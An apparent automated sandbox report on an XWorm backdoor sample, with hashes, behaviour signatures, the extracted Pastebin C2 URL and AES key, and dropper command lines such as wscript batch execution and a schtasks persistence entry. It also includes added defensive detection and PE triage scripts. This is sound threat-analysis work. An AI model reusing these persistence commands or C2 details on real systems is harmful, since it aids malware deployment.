Windows Analysis Report
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Overview

General Information

Sample name: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Analysis ID: 1417469
MD5: 63b3dd980ac9a06fd167b0df8121c979
SHA1: eb2737c8940e03d64c8b6e3ff59db07a1a1ec4a0
SHA256: 44d97e36a72d87c6b928ccc6ec05a80672bcbf65fc357e0e4ac20ecdd11e837e
Tags: exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign process
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppresses errors)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file does not import any functions
PE file overlay found
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long command-line option found; this is very uncommon (may be encrypted or packed)
Yara signature match
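The process-creation findings in the signature list above (WScript dropper run in batch mode, ping.exe used as a sleep, execution of a suspicious .pif extension, schtasks from an env-var folder, RegAsm.exe used as an injection host) expressed as detection logic. This is an added example, not Joe Sandbox or Sigma rule code. The event records are constructed from command lines this report shows elsewhere (wscript.EXE //B on EcoScape.js under AppData, ping -n 5 127.0.0.1 spawned by cmd.exe, Telecom.pif and a copied RegAsm.exe under INetCache\23855); the schtasks command line is an assumption, because the report does not print it, and the two benign control events are invented.

```python
"""Detection checks for the process-creation patterns flagged in this report.
Added example, not Joe Sandbox or Sigma code. Events are Sysmon EID 1-style
records constructed from the command lines the report shows; the schtasks line
and the two benign controls are assumed."""
import re

EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\SysWOW64\PING.EXE",
     "CommandLine": "ping -n 5 127.0.0.1",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"Image": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif",
     "CommandLine": r'"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif"',
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"Image": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif"},
    # Assumed: the report flags a suspicious schtasks creation but does not print the line.
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "EcoScape" /tr "wscript.exe //B \"%LOCALAPPDATA%\EcoVision Dynamics\EcoScape.js\"" /sc minute /mo 3',
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    # Benign controls (invented): the real RegAsm from its .NET directory, and a normal ping.
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"RegAsm.exe /codebase MyLib.dll",
     "ParentImage": r"C:\Program Files\Installer\setup.exe"},
    {"Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": "ping -n 2 fileserver01",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Directories an unprivileged user can write to; paths here are where droppers land.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|INetCache|Downloads)\\", re.I)
ENV_USER_DIRS = re.compile(r"%(localappdata|appdata|temp|tmp|userprofile)%", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
# ping <anything> -n <count> <loopback>: a loop-safe sleep that never touches the network.
PING_SLEEP = re.compile(r"\bping(?:\.exe)?\b.*?-n\s+\d+\b.*?(?:^|\s)(127\.0\.0\.1|localhost|::1)(?:\s|$)", re.I)
DOTNET_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}


def check_event(ev):
    """Return the names of every pattern the event matches (empty list if none)."""
    image = ev["Image"].lower()
    base = image.rsplit("\\", 1)[-1]
    cmd = ev["CommandLine"]
    parent = ev["ParentImage"].lower()
    hits = []
    # 1. Script host in batch mode (//B suppresses error dialogs) on a script in a user-writable path.
    if base in ("wscript.exe", "cscript.exe") and re.search(r"(?<![\w/])//b\b", cmd, re.I) \
            and USER_WRITABLE.search(cmd) and SCRIPT_EXT.search(cmd):
        hits.append("wsh_batch_mode_script_from_user_path")
    # 2. ping against loopback with a count, spawned by cmd.exe: a delay, not a reachability check.
    if base == "ping.exe" and PING_SLEEP.search(cmd) and parent.endswith("\\cmd.exe"):
        hits.append("ping_loopback_sleep")
    # 3. Executable with a misleading extension (.pif/.scr/.com) started from a user-writable path.
    if base.endswith((".pif", ".scr", ".com")) and USER_WRITABLE.search(image):
        hits.append("suspicious_extension_from_user_path")
    # 4. A .NET LOLBin running from anywhere but %WINDIR%\Microsoft.NET: a copied injection host.
    if base in DOTNET_LOLBINS and "\\microsoft.net\\" not in image:
        hits.append("dotnet_lolbin_outside_install_dir")
    # 5. Scheduled task whose action lives in a user-writable or env-var folder.
    if base == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and re.search(r"/tr\s", cmd, re.I) \
            and (USER_WRITABLE.search(cmd) or ENV_USER_DIRS.search(cmd)):
        hits.append("schtasks_action_from_user_path")
    return hits


def scan(events):
    """Run check_event over a list of events; one hit list per event, in order."""
    return [check_event(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(EVENTS, scan(EVENTS)):
        print(ev["Image"].rsplit("\\", 1)[-1], "->", hits or "clean")
```

The loopback check (rule 2) is what separates "ping as sleep" from ordinary connectivity tests: a count against 127.0.0.1 from a cmd.exe parent is almost never operator-typed. Rule 4 is the one that would have caught the RegAsm.exe copy in INetCache\23855 before any injection telemetry: the binary name is legitimate, the directory is not.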

Classification

AV Detection

Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Virustotal: Detection: 21%
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe ReversingLabs: Detection: 21%
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack String decryptor: https://pastebin.com/raw/Dh8E7H3R
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack String decryptor: <123456789>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack String decryptor: <Xwormmm>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack String decryptor: ASGARD
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack String decryptor: USB.exe
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source: Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_00406850 FindFirstFileW,FindClose, 0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_0047C622 FindFirstFileExW, 11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose, 11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B7333 FindFirstFileW,FindClose, 11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 11_2_004B73D4
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
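The static PE findings above (invalid certificate, invalid checksum, no imported functions on the dropped Northeast file, data appended to the last section, NSIS strings in the top-level sample) as a small triage script. This is an added example, not Joe Sandbox code: it recomputes the optional-header checksum the way ImageHlp's CheckSumMappedFile does, measures the overlay past the last section, and reports whether import and Authenticode directories are present. The PE it checks is constructed inline by build_sample_pe() so the script runs offline; the analysed file is not embedded and the function and parameter names are this example's own.

```python
"""Static PE triage: header checksum, overlay size, import table and
Authenticode directory presence. Added example, not Joe Sandbox code.
build_sample_pe() constructs a minimal PE32 in memory; it stands in for the
analysed file, which is not embedded here."""
import struct


def _u16(b, o):
    return struct.unpack_from("<H", b, o)[0]


def _u32(b, o):
    return struct.unpack_from("<I", b, o)[0]


def checksum_field_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (sig) + 20 (COFF) + 64."""
    return _u32(data, 0x3C) + 24 + 64


def pe_checksum(data, skip_offset):
    """Sum 32-bit words with end-around carry, skipping the CheckSum dword,
    fold to 16 bits, add the file length (ImageHlp's algorithm)."""
    if skip_offset % 4:
        raise ValueError("CheckSum field is not dword aligned")
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip_offset:
            continue
        total += _u32(padded, off)
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def triage(data):
    """Return the static indicators for one PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = _u32(data, 0x3C)
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = _u16(data, pe + 6)
    opt_size = _u16(data, pe + 20)
    opt = pe + 24
    magic = _u16(data, opt)
    if magic == 0x10B:                      # PE32
        ndd_off, dd_off = opt + 92, opt + 96
    elif magic == 0x20B:                    # PE32+
        ndd_off, dd_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic %#x" % magic)
    ndd = _u32(data, ndd_off)

    def datadir(i):                         # (VirtualAddress, Size) or zeros if absent
        return (0, 0) if i >= ndd else (_u32(data, dd_off + 8 * i), _u32(data, dd_off + 8 * i + 4))

    # Overlay = bytes after the highest raw-data end of any section (NSIS keeps its payload there).
    sec = opt + opt_size
    end_of_sections = 0
    for i in range(nsec):
        raw_size, raw_ptr = _u32(data, sec + 40 * i + 16), _u32(data, sec + 40 * i + 20)
        end_of_sections = max(end_of_sections, raw_ptr + raw_size)
    stored = _u32(data, opt + 64)
    computed = pe_checksum(data, opt + 64)
    imp_rva, imp_size = datadir(1)          # IMAGE_DIRECTORY_ENTRY_IMPORT
    cert_off, cert_size = datadir(4)        # IMAGE_DIRECTORY_ENTRY_SECURITY (file offset, not RVA)
    return {
        "checksum_stored": stored, "checksum_computed": computed,
        "checksum_ok": stored == computed,
        "overlay_size": max(0, len(data) - end_of_sections),
        "has_import_table": imp_rva != 0 and imp_size != 0,
        "has_authenticode_dir": cert_off != 0 and cert_size != 0,
    }


def build_sample_pe(checksum=0, overlay=b"", with_imports=False):
    """Constructed minimal PE32: one 0x200-byte section, no imports, no signature."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                     # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)               # Section/File alignment
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)               # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 64, checksum)                     # CheckSum
    struct.pack_into("<I", opt, 92, 16)                           # NumberOfRvaAndSizes
    if with_imports:
        struct.pack_into("<II", opt, 96 + 8, 0x1100, 0x28)        # import directory RVA, size
    sect = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + coff + bytes(opt) + sect
    headers += b"\0" * (0x200 - len(headers))
    return headers + b"\xCC" * 0x200 + overlay


if __name__ == "__main__":
    clean = build_sample_pe()
    good = pe_checksum(clean, checksum_field_offset(clean))
    for name, blob in (("linked_ok", build_sample_pe(checksum=good)),
                       ("appended_overlay", build_sample_pe(checksum=good, overlay=b"payload" * 16))):
        print(name, triage(blob))
```

A stored checksum of zero is common for unsigned user-mode binaries and is not by itself suspicious; a nonzero value that no longer matches means the file was modified after linking (packed, patched, or given an overlay), which is the condition the report's "invalid checksum" signature describes. The loader only enforces the checksum for kernel-mode drivers, so the mismatch is an indicator, not a load failure. Presence of a security directory only says a certificate table exists; validating it (and catching the "invalid certificate" case) needs the Authenticode hash and chain checks, which this script does not attempt.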

Networking

Source: Malware configuration extractor URLs: https://pastebin.com/raw/Dh8E7H3R
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: unknown DNS traffic detected: query: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF reply code: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif Code function: 11_2_004BD889 InternetReadFile,SetEvent,GetLastError,SetEvent, 11_2_004BD889
Source: unknown DNS traffic detected: queries for: sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr, Plugins.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Plugins.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
